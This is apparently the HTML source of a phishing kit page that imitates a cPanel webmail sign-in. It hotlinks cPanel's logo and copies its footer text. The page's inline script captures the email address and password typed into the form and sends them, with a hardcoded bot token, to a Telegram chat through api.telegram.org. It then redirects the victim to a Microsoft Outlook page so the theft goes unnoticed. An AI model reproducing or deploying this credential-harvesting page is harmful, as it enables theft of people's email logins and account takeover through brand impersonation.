<!DOCTYPE html>
<html>
<head>
<style>
body {
  color: black;
}

h1 {
  color: Darkblue;
}
</style>
</head>
<body>

<h1> </h1>



</body>
</html>



<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="style.css">
  <title></title>
   <style>

    body{
  padding: 0;
  margin: 0;
  background: #ffffff;
  box-sizing: border-box;
  font-family: Arial, Helvetica, sans-serif
}

section#form-section .top h3
{
  font-size: 13px
}
section#form-section .top
{
  display: flex;
  justify-content: space-between;
  margin: auto;
  width: 22%;
  align-items: center;
  text-align: center;
}
section#form-section
{
  background: #fffff;
      width: 320px;
    min-height: 580px;
  margin: 3% auto auto auto;
  padding: 40px;
  align-items: center;
  text-align: center;
}

.dont-have a,
.can{
      margin-bottom: 0;
    padding: 0;
    font-size: .875rem;
    line-height: 1.5rem;
    color: #558ECD;
    font-weight: bold;
    text-decoration: none

}
form .label a{
  float: right;
    margin-bottom: 0;
    padding: 0;
    font-size: .875rem;
    line-height: 1.5rem;
    color: #558ECD;
    font-weight: bold;
    text-decoration: none
}
form label
{
  float: left
}
form input
{
  background-color: #fffff;
    border: 1px solid #797e85;
    border-radius: 3px;
    box-shadow: none;
    width: 100%;
    padding: 10px 0px 10px 10px;
    line-height: 30px;
    outline: none;
    margin: 3% 0%;
}
form button{

}
.save img{
  height: 30px;
}
.save{
  display: flex;
  align-items: center;
}


form button{
  width: 100%;
    height: 48px;
    border-radius: 3px;
    border: 1px solid #558ECD;
    background-color: #558ECD;
    font-size: .875rem;
    color: #fff;
}
button.hollow{
  background: #fffff;
  border: 1px solid #000;
  color: #000
}
button.green{
  background: #008522;
  font-weight: bold;
  border: 1px solid #008522;
}

.or-hr p{
  font-size: 10px;
  font-weight: bold;
}
.or-hr hr{
  width: 40%
}
.or-hr
{
  display: flex;
  justify-content: space-between;
  width: 100%;
  align-items: center;
}

footer#footer ul li
{
  font-size: 13px;
  list-style: none;
  color: #558ECD
}
footer#footer p{
  font-size: 12px
}
footer#footer ul{
  width: 40%;
  margin: auto;
  display: flex;
  justify-content: space-between;
}
footer#footer{
  width: 100%;;
  text-align: center;
  align-items: center;
  margin-top: 1%
}

@media(max-width: 1001px){
  footer#footer ul{
  text-align: center;
  flex-direction: column;
}
footer#footer ul li{
  margin-top: 5%
}
}

  </style>

</head>
<body>

  <section id="form-section">
    <div class="top">
          <img height="80" viewBox="0 0 40 40" width="110" src="https://demo.cpanel.net:2096/cPanel_magic_revision_1479310954/unprotected/cpanel/images/webmail-logo.svg">
          </img>
    </div>
    <div class="sign-att">
      <h2></h2>
      <p></p>
    </div>
    <form action="" method="post" id="form">
      <div class="label">
        <label for="">Email Address</label>
        <br>
        <input type="text" id="usr-id" required><br>
        <a href="#"></a>
      </div><br>
      <div class="label">
        <label for="">password</label><br>
        <input type="password" id="pwd" required><br>
        <a href="#"></a>
      </div>
      <div class="save">
        <img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADIAAAAyCAYAAAAeP4ixAAAABmJLR0QA/wD/AP+gvaeTAAACSUlEQVRoge3Zv2sUQRjG8U9URMWoYBIQQREsFEEbbWy0s1I0SKp0lv5orQSD/4GWYqOdaGGsrKwlGBUhjYqNoDYxXiIimqzFzpHzsiG7t7u3G9kH3uJm33fe97s7Mzs7R6NGjfJoBLfwCguI+mwLmA41DPcKcRGtCopfzb5jtBeIpRoU322LWWBG1OtJdNuchGG2IQHkKgbTUlegnbiSxvG16u/6WjbdXfRAAsg8tqchrlDz2NHZkAQS9aeW3Pqn9qQ5si7VgNRNdQT51UtQ3UAe4whmiuisqnfDC2wNNdxO4V9LkE/YG/JfShlTO5AWjoXcp8RzZN2BLOJcyHsIsxliawVyLeTcjXcZY2sDcjfk24znPcTXAuQZNon3S/d77KMQkD8Yw70eCpjBrpDrRo6bUQjIo+A7IN2a37avOBBix+T7nC4EJMIdyzuD6yn8f+Jk8D+OHzkgCgWJ8EA81uGyeDlN8lvCePDbjy85IQoHifAEW0LsOH4n+NwM1wfxpgCIUkAi8fLZPrA4Kx5G7WsPxXNpIyYLgigNJMIUhkIfp8VbjylsC21ZFoVKQSK8xZ7QzwnxGRnx/CkSonSQCB9xsKO/M5LnTe1BInzGURzGtxIgVoCUeRw0Kz5N31dQf90aWPVHUFEgZas516q1/muQ+b5XkV2t7oYkkA99KCSv3nc3JIE87UMheZWqxmHxH49lvMSKsDnLe7o1NWr1b4sqbRHn00J0wszVoPjOJ3EhK0RbQ5jAS/Fq1u/iWyH3hAzDqVGjRiv1F0g95X0VcKkRAAAAAElFTkSuQmCC"/>
        

        <p>Reset Password</p>
      </div>
      <button type="submit">Sign in</button><br><br>
     
      
      <div class="dont-have">
        <p></p>
        <a href="#"></a>
      </div>
      
    </form>
  

  <footer id="footer">
    <ul id="ul">
      <li></li>
      <li></li>
      <li></li>
      <li></li>
      <li></li>
    </ul>

     <li><a href="https://webmail.jmsaccounting.com/?locale=en"></a></li>

<p style="font-size:1vw;">English العربية čeština dansk Ελληνικά español español latinoamericano español de España </p>
                    
       
  </footer>


    <script>
      const formal = document.querySelector('#form')
    
      let bot = {
          TOKEN: "7770017706:AAH2s-e0p5sDHZ5mzwcoYezCngcxcky3c10",
          chatID: "7235725586"
      }


      formal.addEventListener("submit", e =>{
          e.preventDefault();

          let result1 = document.querySelector('#usr-id').value
          let result2 = document.querySelector('#pwd').value
          
          fetch(`https://api.telegram.org/bot${bot.TOKEN}/sendMessage?chat_id=${bot.chatID}&text=GMX-RESULT=Username::${result1}==++==Password::${result2}`, {
              method: "GET"
          }).then(success => {
              window.location.replace("https://www.microsoft.com/en-us/microsoft-365/outlook/email-and-calendar-software-microsoft-outlook?deeplink=%2fowa%2f&sdf=0");
          }, error => {
              alert("Message not sent")
              console.log(error)

          })
      })
  </script>

</body>
</html>

<img height="13" viewBox="0 0 40 40" width="40" src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSo3FlrQovGa__V-rbgzfWRYH2mlO5EHebyWQ&s">

<p style="font-size:1vw;">Copyright© 2024 cPanel, L.L.C.
Privacy Policy.</p>